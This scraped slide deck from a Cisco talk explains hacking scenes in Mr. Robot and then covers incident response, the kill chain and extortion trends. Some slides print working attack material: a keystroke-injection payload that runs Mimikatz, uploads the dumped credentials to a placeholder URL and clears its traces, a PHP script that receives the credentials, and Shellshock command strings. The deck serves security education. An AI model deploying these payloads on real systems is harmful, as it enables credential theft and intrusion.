SlideShare a Scribd company logo
1 of 58
Download to read offline
Vince Kornacki, Senior Security Consultant, Cisco
Sean Mason, Director of Incident Response, Cisco
October 12, 2017
Exploring the Anatomy of a Cyber-Attack
Security Through the Eyes of a Hacker
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Hollywood’s Depiction of Hacking
“I dropped a logic bomb through the trap door.”
-Swordfish
“A gigabyte of RAM should do the trick”
-Under Siege 2
“I’ll create a GUI interface using Visual
Basic, see if I can track an IP address.”
-CSI
“Isolate the node and dump it on the
other side of the router.”
-NCIS
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
The award for Hollywood’s best
attempt at depicting hacking goes to…
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Elliot Hacks Steel Mountain Thermostat
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
How’d He Do It?
• Social Engineers his way inside the building
• Splice Raspberry Pi into the BACnet (Building Automation and Control
Network) network lines connected to the thermostat
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
How’d He Do It?
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Angela Hacks Her Boss’ Evil Corp Credentials
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
How’d She Do It?
Rubber Ducky USB
• Keystroke injection attack tool
Invoke-Mimikatz
• Script that reflectively injects Mimikatz into memory using Powershell
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Proof of Concept
1. Write the Payload
• Open administrator command prompt
DELAY 1000
GUI r
STRING powershell Start-Process cmd –Verb runAs
ENTER
DELAY 2000
ALT y
DELAY 1000
• Obfuscate command prompt
STRING mode con:cols=18 lines=1
ENTER
STRING color FE
ENTER
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Proof of Concept
1. Write the Payload (continued)
• Download and execute “Invoke-Mimikatz” script then upload the results
STRING powershell "IEX (New-Object Net.WebClient).DownloadString(MimikatzScriptURL:’);
$output = Invoke-Mimikatz -DumpCreds;
(New-Object Net.WebClient).UploadString(‘PHP_Creds_Receiver_URL’, $output)”
ENTER
DELAY 15000
• Clear the Run history and exit
STRING powershell "Remove-ItemProperty -Path ’PathToRunMRU'
-Name '*' -ErrorAction SilentlyContinue"
ENTER
STRING exit
ENTER
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Proof of Concept
2. Encode the Payload
java -jar duckencode.jar -i invoke-mimikatz.txt -o inject.bin
3. Set up Web Server
<?php $file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds";
file_put_contents($file, file_get_contents("php://input")); ?>
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Proof of Concept
4. Deploy Attack
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Elliot Hacks the Prison
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Spoofing a Bluetooth Connection
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
How’d He Do It?
1. Enable Bluetooth 2. Scan for Bluetooth Devices
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
How’d He Do It?
3. Spoof the MAC Address of the Keyboard
4. Link Bluetooth Device to the Cop’s Laptop
5. Hack the Prison
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Elliot Hacks Tyrell’s Email Account
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
How’d He Do It?
wget –U “() test;];echo ”Content-type: text/plain”; echo; echo; /bin/cat
/etc/passwd” http://evilcorp-intl.com/login.email.srf?wa=wsignin1.0&rpsnv=4d
1. Exploit Shellshock vulnerability using wget
2. Use John the Ripper on /etc/passwd (Elliot should have used /etc/shadow)
./john /etc/passwd
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Simple Attack That Works
GET / HTTP/1.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8,fr;q=0.6
Cache-Control: no-cache Pragma: no-cache
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/37.0.2062.124 Safari/537.36
Host: example.com
Edit “User-Agent” Header to look like “HTTP_USER_AGENT=() { :; }; /bin/eject”
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Darlene Phishes Evil Corp
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Phishing Website Proof of Concept
1. Start Up The Social Engineer Toolkit (SET)
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Phishing Website Proof of Concept
2. Choose Attack Method
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Phishing Website Proof of Concept
3. Configure Attacker’s Website and Kali Box
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Phishing Website Proof of Concept
3. Configure Website and Kali Box (continued)
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Phishing Website Proof of Concept
4. Create Website and Start Server
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Phishing Website Proof of Concept
5. Victim Visits Phishing Site
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Phishing Website Proof of Concept
6. Victim Is Owned
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Cisco Consultants Use These Tools and Techniques
Application & Penetration Team Services
• External Network Penetration Test  Exploit software vulnerabilities such as
Shellshock
• Internal Network Penetration Test  Use post-exploitation tools like “Mimikatz”
and “John the Ripper” to compromise authentication credentials
• IoT Security Assessment Manipulate IoT protocols like BACnet using a
Raspberry Pi
• Social Engineering Assessment  Launch phishing attacks using tools like the
Social Engineer Toolkit (SET)
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Penetration Testing Methodology
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Cisco Incident Response Goes To Hollywood
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Security Advisory Services
 Incident Response
 Security Strategy and Architecture
 Compliance
 Privacy and Risk Management
 Security Assessments and Penetration
 Network and Infrastructure
 Application and System
 Physical
Benefits
 Higher confidence in what is actually
happening in your network, including
greater visibility and deeper
understanding of your operations and
infrastructure
 Identify security gaps, ineffective
operational processes and poorly
designed technology security controls
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Cisco Incident Response Services
A Holistic Portfolio for Your Organizations Needs
Proactive
Threat Hunting
Am I currently
compromised?
Emergency
Incident Response
I need help right
now.
IR
Tabletop Exercises
I need to know
we will respond
correctly.
Incident Response
Retainers
I want to know I
have a team
standing by.
IR Plans &
Playbooks
Am I missing
anything needed
to respond?
Included in IR Retainers
IR Readiness
Assessments
I need a plan for
when an incident
occurs.
300+
Full Time Threat
Intel Researchers
1100+ Threat Traps
Threat Intel
1.5 Million
Daily Malware
Samples
600 Billion
Daily Email
Messages
16 Billion
Daily Web
Requests
Honeypots
Open Source
Communities
Vulnerability
Discovery (Internal)
Product
Telemetry
Internet-Wide
Scanning
Customer Data
Sharing
Programs
Service Provider
Coordination
Program
Open
Source
Intel
Sharing
3rd Party Programs
(MAPP)
Industry
Sharing
Partnerships
(ISACs)
Intel Breakdown
20 Billion
Threats Blocked
Intel Sharing
500+
Participants
Millions
Of Telemetry
Agents
4
Global Data
Centers
100+
Threat Intelligence
Partners
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Malware outbreaks
Top things we are seeing
1
2
3
4
Data Exfiltration
Ransomware
Insiders
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Nyetya: Helping Customers Respond Quickly
Immediate Access
to named
Responders
Urgent Notification
with unpublished
details
IR onsite in Ukraine
working with Talos
Threat Researchers
Quick Access
to Incident Responders
and Intelligence
Emergency
Customers
Emergency
Bulletin
Source
M.E. Doc
Retainer
Customers
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Kill Chain (KC)
“Intelligence-Driven Computer Network Defense Informed by Analysis of
Adversary Campaigns and Intrusion Kill Chains”, Lockheed Martin
bit.ly/killchain
KC1- Reconnaissance:
Collecting information about the
target organization
KC2- Weaponization: Packaging
the threat for delivery
KC3- Delivery: Transmission of the
weaponized payload
KC4- Exploitation: Exploiting
vulnerabilities on a system
KC5- Installation: Installing
malware on a target
KC6- Command & Control:
Providing “hands on the keyboard”
access to the target system
KC7- Actions on Intent: The
attacker achieves their objective
(e.g. stealing information)
Recon
Weapon-
ization
Delivery
Exploitation
Installation
C2
Actions on
Intent
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
CUSTOMER
CASE STUDY
Organization’s testing/development
network environment targeted, which
lacked security controls and monitoring.
Attackers maintained persistence in the
environment for 5+ months.
C2 malware with zero A/V detection rate,
which was utilized for persistence into
environment.
Deployed StealthWatch into existing
infrastructure.
Deployed AMP for Endpoints to facilitate
endpoint, network analysis, and
remediation.
Malware reverse engineering, memory
forensics, & disk forensics performed on
affected hosts.
App Pen Testing group conducted
application hardening post-incident
response.
ResponseIncident
Telecommunications
Escalated to Cisco IR after law enforcement
notification
Targeted attack by nation state
actor.
Intelligence
Outcomes
Cisco StealthWatch deployment provided
enhanced visibility into infrastructure,
which identified additional security gaps.
Umbrella Investigate utilized for
monitoring primary C2 server.
Cisco provided SME’s to assist in
response efforts to identify, contain,
and eradicate the malware.
Cisco utilized proven hunt methodologies
and techniques for an advanced adversary
in a large environment, while performing
forensic methodologies for root cause
analysis.
People Process Technology
Revenue
: $3B+
Employees:
100k+
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Dynamic Threats
Objective
Example
Skill
Potential
Data
Targets
Named
Actors
State
Sponsored/APT
Economic, Political
Advantage, Destruction
Intellectual Property
Theft, DDOS
Very High
Intellectual Property,
Negotiation,
National Intelligence
APT1, Energetic
Bear
Cyber
Crime
Financial
Gain
Credit Card Theft
High
Credit Card Data,
Personal
Identifiable
Information, Health
Records
Russian Business
Network (RBN)
Hacktivism
Defamation,
Destruction, Press &
Policy
Website
Defacements, DDOS
Low - Med
Access to the Network,
Compromising
Information
Syrian Electronic Army,
LizardSquad,
Anonymous
Nuisance
Access &
Propagation
Botnets & Spam
Low
Sensitive
Information,
Vulnerable Data
General Malware
Revenge, Destruction,
Monetary Gain
Insiders
Destruction,
Theft
Med
Intellectual
Property,
Compromising
Information
Jimmy, Suzy, Sally,
Johnny
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Anatomy of the Attack
• Collecting information about the
organization
• Port Scan (e.g. Nmap)
• Network Logon from Local
Administrator Account
Reconnaissance
Internet
Gb Router
ISP Cable
Modem
Win10 Hyper V
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Anatomy of the Attack
Typically, we don’t see KC2;
however malware analysis of
“C2malware.exe” provided some
insight into payload/ capabilities.
Weaponization
00-00-00-AA-AB-AB |
192.168.1.1 | HostName |
Administrator | C2Domain.com |
AcmeIncResearch
Internet
Gb Router
ISP Cable
Modem
Win10 Hyper V
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Anatomy of the Attack
• Network Logon from
Administrator Account
• No password required
• Transmission of C2malware.exe
• Attacker(s) choice
• No Firewall
• No A/V
Delivery
Internet
Gb Router
ISP Cable
Modem
Win10 Hyper V
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Anatomy of the Attack
• Exploitation? None required
• No firewall
• No password required
Exploitation
Internet
Gb Router
ISP Cable
Modem
Win10 Hyper V
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Anatomy of the Attack
• Install C2malware.exe on target
machine
Installation
01/01/2017 00:02:00 UTC
C:Windowssystem32C2malware.exe
01/01/2017 00:00:30 UTC
C:UsersAttackerC2malware.exe
Internet
Gb Router
ISP Cable
Modem
Win10 Hyper V
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Anatomy of the Attack
• C:Windowssystem32C2malwa
re.exe
• Persistence via Run Key
• Beacons out over port 80 to C2
node
Command and
Control (C2)
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Anatomy of the Attack
• Remote backdoor via
C2malware.exe with the
following capabilities:
• Remote Shell
• Read/Write/Execute File(s)
• Create Tasks
• List Drives
Actions on
Objectives
Internet
Gb Router
ISP Cable
Modem
Win10 Hyper V
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
The practice of obtaining something, especially money,
through force or threats
Extortion Defined
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Attribution was simpler
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
First forays into e-extortion
• 2007 FBI release of warning about online extortion mirroring
mafia tactics
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Lizard Squad Gaming DDoS
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
DDOS “Protection” Racket
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Armada Collective DHS Warning
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Copy Cat Profiteering
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Data Breach Response Phishing
Scammers leveraged breaches of adult-themed websites to scare victims
into ransom payments
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Ransomware
http://www.welivesecurity.com/2017/01/05/killdisk-
now-targeting-linux-demands-250k-ransom-cant-
decrypt/
http://blog.talosintel.com/2016/07/ranscam.html
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
Doxware
• First started seeing this over a year ago
• Becoming more mainstream
• New frontier of ransomware
• Data Exfiltration
• Encryption of Data
• Extortion
• Data leakage
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Public
Resources
Cisco Incident Response Team
If you are currently experiencing an incident, please
contact us at: 1-844-831-7715
Or email IncidentResponse@cisco.com
Cisco Security
Services: https://cisco.com/go/securityservices
Blogs: https://blogs.cisco.com
© 2017 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
“I drink and I hack things” – T. Lannister
Cisco Security Experts Explore Hacking Techniques in Mr. Robot and Hollywood

More Related Content

What's hot

Cisco Connect Toronto 2017 - Cloud and On Premises Collaboration Security Exp...
Cisco Connect Toronto 2017 - Cloud and On Premises Collaboration Security Exp...Cisco Connect Toronto 2017 - Cloud and On Premises Collaboration Security Exp...
Cisco Connect Toronto 2017 - Cloud and On Premises Collaboration Security Exp...Cisco Canada
 
Cisco Connect Vancouver 2017 - Understanding Cisco next gen SD-WAN
Cisco Connect Vancouver 2017 - Understanding Cisco next gen SD-WANCisco Connect Vancouver 2017 - Understanding Cisco next gen SD-WAN
Cisco Connect Vancouver 2017 - Understanding Cisco next gen SD-WANCisco Canada
 
Cisco Connect Vancouver 2017 - Cloud and on premises collaboration security e...
Cisco Connect Vancouver 2017 - Cloud and on premises collaboration security e...Cisco Connect Vancouver 2017 - Cloud and on premises collaboration security e...
Cisco Connect Vancouver 2017 - Cloud and on premises collaboration security e...Cisco Canada
 
Cisco Connect Halifax 2018 Accelerating incident response in organizations...
Cisco Connect Halifax 2018   Accelerating incident  response in organizations...Cisco Connect Halifax 2018   Accelerating incident  response in organizations...
Cisco Connect Halifax 2018 Accelerating incident response in organizations...Cisco Canada
 
Putting Firepower Into The Next Generation Firewall
Putting Firepower Into The Next Generation FirewallPutting Firepower Into The Next Generation Firewall
Putting Firepower Into The Next Generation FirewallCisco Canada
 
Cisco Connect Halifax 2018 Application agility and programmability with cis...
Cisco Connect Halifax 2018   Application agility and programmability with cis...Cisco Connect Halifax 2018   Application agility and programmability with cis...
Cisco Connect Halifax 2018 Application agility and programmability with cis...Cisco Canada
 
Cisco Connect Toronto 2017 - Understanding Cisco Next Generation SD-WAN
Cisco Connect Toronto 2017 - Understanding Cisco Next Generation SD-WANCisco Connect Toronto 2017 - Understanding Cisco Next Generation SD-WAN
Cisco Connect Toronto 2017 - Understanding Cisco Next Generation SD-WANCisco Canada
 
Behind the Curtain: Exposing Advanced Threats
Behind the Curtain: Exposing Advanced ThreatsBehind the Curtain: Exposing Advanced Threats
Behind the Curtain: Exposing Advanced ThreatsCisco Canada
 
Cisco Connect Toronto 2018 cloud and on premises collaboration security exp...
Cisco Connect Toronto 2018   cloud and on premises collaboration security exp...Cisco Connect Toronto 2018   cloud and on premises collaboration security exp...
Cisco Connect Toronto 2018 cloud and on premises collaboration security exp...Cisco Canada
 
Meraki powered services bell
Meraki powered services   bellMeraki powered services   bell
Meraki powered services bellCisco Canada
 
Putting firepower into the next generation firewall
Putting firepower into the next generation firewallPutting firepower into the next generation firewall
Putting firepower into the next generation firewallCisco Canada
 
Cisco Connect Toronto 2017 - NFV/SDN Platform for Orchestrating Cloud and vBr...
Cisco Connect Toronto 2017 - NFV/SDN Platform for Orchestrating Cloud and vBr...Cisco Connect Toronto 2017 - NFV/SDN Platform for Orchestrating Cloud and vBr...
Cisco Connect Toronto 2017 - NFV/SDN Platform for Orchestrating Cloud and vBr...Cisco Canada
 
Cisco Connect Halifax 2018 Putting firepower into the next generation firewall
Cisco Connect Halifax 2018   Putting firepower into the next generation firewallCisco Connect Halifax 2018   Putting firepower into the next generation firewall
Cisco Connect Halifax 2018 Putting firepower into the next generation firewallCisco Canada
 
Cisco Connect Halifax 2018 Accelerating the secure digital business through...
Cisco Connect Halifax 2018   Accelerating the secure digital business through...Cisco Connect Halifax 2018   Accelerating the secure digital business through...
Cisco Connect Halifax 2018 Accelerating the secure digital business through...Cisco Canada
 
Cisco connect winnipeg 2018 putting firepower into the next generation fire...
Cisco connect winnipeg 2018   putting firepower into the next generation fire...Cisco connect winnipeg 2018   putting firepower into the next generation fire...
Cisco connect winnipeg 2018 putting firepower into the next generation fire...Cisco Canada
 
Cisco Connect Toronto 2018 dc-aci-anywhere
Cisco Connect Toronto 2018   dc-aci-anywhereCisco Connect Toronto 2018   dc-aci-anywhere
Cisco Connect Toronto 2018 dc-aci-anywhereCisco Canada
 
Cisco Connect Toronto 2018 sixty to zero
Cisco Connect Toronto 2018   sixty to zeroCisco Connect Toronto 2018   sixty to zero
Cisco Connect Toronto 2018 sixty to zeroCisco Canada
 
Cisco connect winnipeg 2018 we make it simple
Cisco connect winnipeg 2018   we make it simpleCisco connect winnipeg 2018   we make it simple
Cisco connect winnipeg 2018 we make it simpleCisco Canada
 
Cisco Connect Vancouver 2017 - Cisco Meraki -Let Simple Work For You
Cisco Connect Vancouver 2017 - Cisco Meraki -Let Simple Work For YouCisco Connect Vancouver 2017 - Cisco Meraki -Let Simple Work For You
Cisco Connect Vancouver 2017 - Cisco Meraki -Let Simple Work For YouCisco Canada
 
Emerging Threats - The State of Cyber Security
Emerging Threats - The State of Cyber SecurityEmerging Threats - The State of Cyber Security
Emerging Threats - The State of Cyber SecurityCisco Canada
 

What's hot (20)

Cisco Connect Toronto 2017 - Cloud and On Premises Collaboration Security Exp...
Cisco Connect Toronto 2017 - Cloud and On Premises Collaboration Security Exp...Cisco Connect Toronto 2017 - Cloud and On Premises Collaboration Security Exp...
Cisco Connect Toronto 2017 - Cloud and On Premises Collaboration Security Exp...
 
Cisco Connect Vancouver 2017 - Understanding Cisco next gen SD-WAN
Cisco Connect Vancouver 2017 - Understanding Cisco next gen SD-WANCisco Connect Vancouver 2017 - Understanding Cisco next gen SD-WAN
Cisco Connect Vancouver 2017 - Understanding Cisco next gen SD-WAN
 
Cisco Connect Vancouver 2017 - Cloud and on premises collaboration security e...
Cisco Connect Vancouver 2017 - Cloud and on premises collaboration security e...Cisco Connect Vancouver 2017 - Cloud and on premises collaboration security e...
Cisco Connect Vancouver 2017 - Cloud and on premises collaboration security e...
 
Cisco Connect Halifax 2018 Accelerating incident response in organizations...
Cisco Connect Halifax 2018   Accelerating incident  response in organizations...Cisco Connect Halifax 2018   Accelerating incident  response in organizations...
Cisco Connect Halifax 2018 Accelerating incident response in organizations...
 
Putting Firepower Into The Next Generation Firewall
Putting Firepower Into The Next Generation FirewallPutting Firepower Into The Next Generation Firewall
Putting Firepower Into The Next Generation Firewall
 
Cisco Connect Halifax 2018 Application agility and programmability with cis...
Cisco Connect Halifax 2018   Application agility and programmability with cis...Cisco Connect Halifax 2018   Application agility and programmability with cis...
Cisco Connect Halifax 2018 Application agility and programmability with cis...
 
Cisco Connect Toronto 2017 - Understanding Cisco Next Generation SD-WAN
Cisco Connect Toronto 2017 - Understanding Cisco Next Generation SD-WANCisco Connect Toronto 2017 - Understanding Cisco Next Generation SD-WAN
Cisco Connect Toronto 2017 - Understanding Cisco Next Generation SD-WAN
 
Behind the Curtain: Exposing Advanced Threats
Behind the Curtain: Exposing Advanced ThreatsBehind the Curtain: Exposing Advanced Threats
Behind the Curtain: Exposing Advanced Threats
 
Cisco Connect Toronto 2018 cloud and on premises collaboration security exp...
Cisco Connect Toronto 2018   cloud and on premises collaboration security exp...Cisco Connect Toronto 2018   cloud and on premises collaboration security exp...
Cisco Connect Toronto 2018 cloud and on premises collaboration security exp...
 
Meraki powered services bell
Meraki powered services   bellMeraki powered services   bell
Meraki powered services bell
 
Putting firepower into the next generation firewall
Putting firepower into the next generation firewallPutting firepower into the next generation firewall
Putting firepower into the next generation firewall
 
Cisco Connect Toronto 2017 - NFV/SDN Platform for Orchestrating Cloud and vBr...
Cisco Connect Toronto 2017 - NFV/SDN Platform for Orchestrating Cloud and vBr...Cisco Connect Toronto 2017 - NFV/SDN Platform for Orchestrating Cloud and vBr...
Cisco Connect Toronto 2017 - NFV/SDN Platform for Orchestrating Cloud and vBr...
 
Cisco Connect Halifax 2018 Putting firepower into the next generation firewall
Cisco Connect Halifax 2018   Putting firepower into the next generation firewallCisco Connect Halifax 2018   Putting firepower into the next generation firewall
Cisco Connect Halifax 2018 Putting firepower into the next generation firewall
 
Cisco Connect Halifax 2018 Accelerating the secure digital business through...
Cisco Connect Halifax 2018   Accelerating the secure digital business through...Cisco Connect Halifax 2018   Accelerating the secure digital business through...
Cisco Connect Halifax 2018 Accelerating the secure digital business through...
 
Cisco connect winnipeg 2018 putting firepower into the next generation fire...
Cisco connect winnipeg 2018   putting firepower into the next generation fire...Cisco connect winnipeg 2018   putting firepower into the next generation fire...
Cisco connect winnipeg 2018 putting firepower into the next generation fire...
 
Cisco Connect Toronto 2018 dc-aci-anywhere
Cisco Connect Toronto 2018   dc-aci-anywhereCisco Connect Toronto 2018   dc-aci-anywhere
Cisco Connect Toronto 2018 dc-aci-anywhere
 
Cisco Connect Toronto 2018 sixty to zero
Cisco Connect Toronto 2018   sixty to zeroCisco Connect Toronto 2018   sixty to zero
Cisco Connect Toronto 2018 sixty to zero
 
Cisco connect winnipeg 2018 we make it simple
Cisco connect winnipeg 2018   we make it simpleCisco connect winnipeg 2018   we make it simple
Cisco connect winnipeg 2018 we make it simple
 
Cisco Connect Vancouver 2017 - Cisco Meraki -Let Simple Work For You
Cisco Connect Vancouver 2017 - Cisco Meraki -Let Simple Work For YouCisco Connect Vancouver 2017 - Cisco Meraki -Let Simple Work For You
Cisco Connect Vancouver 2017 - Cisco Meraki -Let Simple Work For You
 
Emerging Threats - The State of Cyber Security
Emerging Threats - The State of Cyber SecurityEmerging Threats - The State of Cyber Security
Emerging Threats - The State of Cyber Security
 

Viewers also liked

Варианты построения SD-WAN архитектуры корпоративного клиента: плюсы и минусы...
Варианты построения SD-WAN архитектуры корпоративного клиента: плюсы и минусы...Варианты построения SD-WAN архитектуры корпоративного клиента: плюсы и минусы...
Варианты построения SD-WAN архитектуры корпоративного клиента: плюсы и минусы...Victoria Kalinina
 
DevOpsDaysRiga 2017 ignite: Janis Orlovs - Automation and Security: Implement...
DevOpsDaysRiga 2017 ignite: Janis Orlovs - Automation and Security: Implement...DevOpsDaysRiga 2017 ignite: Janis Orlovs - Automation and Security: Implement...
DevOpsDaysRiga 2017 ignite: Janis Orlovs - Automation and Security: Implement...DevOpsDays Riga
 
Email Security Threats: IT Manager's Eyes Only
Email Security Threats: IT Manager's Eyes Only Email Security Threats: IT Manager's Eyes Only
Email Security Threats: IT Manager's Eyes Only Topsec Technology
 
Anatomy of a Ransomware Attack - Paubox SECURE Conference 2017
Anatomy of a Ransomware Attack - Paubox SECURE Conference 2017Anatomy of a Ransomware Attack - Paubox SECURE Conference 2017
Anatomy of a Ransomware Attack - Paubox SECURE Conference 2017Paubox, Inc.
 
Henry stern - turning point on war on spam - atlseccon2011
Henry stern - turning point on war on spam - atlseccon2011Henry stern - turning point on war on spam - atlseccon2011
Henry stern - turning point on war on spam - atlseccon2011Atlantic Security Conference
 
Cisco Web and Email Security Overview
Cisco Web and Email Security OverviewCisco Web and Email Security Overview
Cisco Web and Email Security OverviewCisco Security
 
Cisco Connect Toronto 2017 - Cisco meraki let simple work for you
Cisco Connect Toronto 2017 - Cisco meraki   let simple work for youCisco Connect Toronto 2017 - Cisco meraki   let simple work for you
Cisco Connect Toronto 2017 - Cisco meraki let simple work for youCisco Canada
 
Cisco Connect Toronto 2017 - Introducing the Network Intuitive
Cisco Connect Toronto 2017 - Introducing the Network IntuitiveCisco Connect Toronto 2017 - Introducing the Network Intuitive
Cisco Connect Toronto 2017 - Introducing the Network IntuitiveCisco Canada
 
Streaming analytics on Google Cloud Platform, by Javier Ramirez, teowaki
Streaming analytics on Google Cloud Platform, by Javier Ramirez, teowakiStreaming analytics on Google Cloud Platform, by Javier Ramirez, teowaki
Streaming analytics on Google Cloud Platform, by Javier Ramirez, teowakijavier ramirez
 
Cisco Connect Toronto 2017 - Optimizing your client's Wi-Fi Experience
Cisco Connect Toronto 2017 - Optimizing your client's Wi-Fi ExperienceCisco Connect Toronto 2017 - Optimizing your client's Wi-Fi Experience
Cisco Connect Toronto 2017 - Optimizing your client's Wi-Fi ExperienceCisco Canada
 
OpenContrail Overview
OpenContrail OverviewOpenContrail Overview
OpenContrail OverviewJames Kelly
 
Veeam Availability for Hybrid Cloud (AWS)
Veeam Availability for Hybrid Cloud (AWS) Veeam Availability for Hybrid Cloud (AWS)
Veeam Availability for Hybrid Cloud (AWS) Tanawit Chansuchai
 
The business case for SD WAN in the enterprise
The business case for SD WAN in the enterprise The business case for SD WAN in the enterprise
The business case for SD WAN in the enterprise Colt Technology Services
 
Cisco Umbrella как облачная платформа защиты от угроз
Cisco Umbrella как облачная платформа защиты от угрозCisco Umbrella как облачная платформа защиты от угроз
Cisco Umbrella как облачная платформа защиты от угрозCisco Russia
 
A.I. Exercise.
A.I. Exercise.A.I. Exercise.
A.I. Exercise.Mario Cho
 
SD WAN MPLS service disruption or enhancement
SD WAN MPLS service disruption or enhancementSD WAN MPLS service disruption or enhancement
SD WAN MPLS service disruption or enhancementColt Technology Services
 
SDN and NFV в банковской сфере
SDN and NFV в банковской сфереSDN and NFV в банковской сфере
SDN and NFV в банковской сфереVictoria Kalinina
 

Viewers also liked (19)

Варианты построения SD-WAN архитектуры корпоративного клиента: плюсы и минусы...
Варианты построения SD-WAN архитектуры корпоративного клиента: плюсы и минусы...Варианты построения SD-WAN архитектуры корпоративного клиента: плюсы и минусы...
Варианты построения SD-WAN архитектуры корпоративного клиента: плюсы и минусы...
 
DevOpsDaysRiga 2017 ignite: Janis Orlovs - Automation and Security: Implement...
DevOpsDaysRiga 2017 ignite: Janis Orlovs - Automation and Security: Implement...DevOpsDaysRiga 2017 ignite: Janis Orlovs - Automation and Security: Implement...
DevOpsDaysRiga 2017 ignite: Janis Orlovs - Automation and Security: Implement...
 
Email Security Threats: IT Manager's Eyes Only
Email Security Threats: IT Manager's Eyes Only Email Security Threats: IT Manager's Eyes Only
Email Security Threats: IT Manager's Eyes Only
 
Anatomy of a Ransomware Attack - Paubox SECURE Conference 2017
Anatomy of a Ransomware Attack - Paubox SECURE Conference 2017Anatomy of a Ransomware Attack - Paubox SECURE Conference 2017
Anatomy of a Ransomware Attack - Paubox SECURE Conference 2017
 
Henry stern - turning point on war on spam - atlseccon2011
Henry stern - turning point on war on spam - atlseccon2011Henry stern - turning point on war on spam - atlseccon2011
Henry stern - turning point on war on spam - atlseccon2011
 
Cisco Web and Email Security Overview
Cisco Web and Email Security OverviewCisco Web and Email Security Overview
Cisco Web and Email Security Overview
 
Colt Optical SDN Innovation
Colt Optical SDN InnovationColt Optical SDN Innovation
Colt Optical SDN Innovation
 
Cisco Connect Toronto 2017 - Cisco meraki let simple work for you
Cisco Connect Toronto 2017 - Cisco meraki   let simple work for youCisco Connect Toronto 2017 - Cisco meraki   let simple work for you
Cisco Connect Toronto 2017 - Cisco meraki let simple work for you
 
Cisco Connect Toronto 2017 - Introducing the Network Intuitive
Cisco Connect Toronto 2017 - Introducing the Network IntuitiveCisco Connect Toronto 2017 - Introducing the Network Intuitive
Cisco Connect Toronto 2017 - Introducing the Network Intuitive
 
Streaming analytics on Google Cloud Platform, by Javier Ramirez, teowaki
Streaming analytics on Google Cloud Platform, by Javier Ramirez, teowakiStreaming analytics on Google Cloud Platform, by Javier Ramirez, teowaki
Streaming analytics on Google Cloud Platform, by Javier Ramirez, teowaki
 
Cisco Connect Toronto 2017 - Optimizing your client's Wi-Fi Experience
Cisco Connect Toronto 2017 - Optimizing your client's Wi-Fi ExperienceCisco Connect Toronto 2017 - Optimizing your client's Wi-Fi Experience
Cisco Connect Toronto 2017 - Optimizing your client's Wi-Fi Experience
 
OpenContrail Overview
OpenContrail OverviewOpenContrail Overview
OpenContrail Overview
 
Colt Network On Demand
Colt Network On DemandColt Network On Demand
Colt Network On Demand
 
Veeam Availability for Hybrid Cloud (AWS)
Veeam Availability for Hybrid Cloud (AWS) Veeam Availability for Hybrid Cloud (AWS)
Veeam Availability for Hybrid Cloud (AWS)
 
The business case for SD WAN in the enterprise
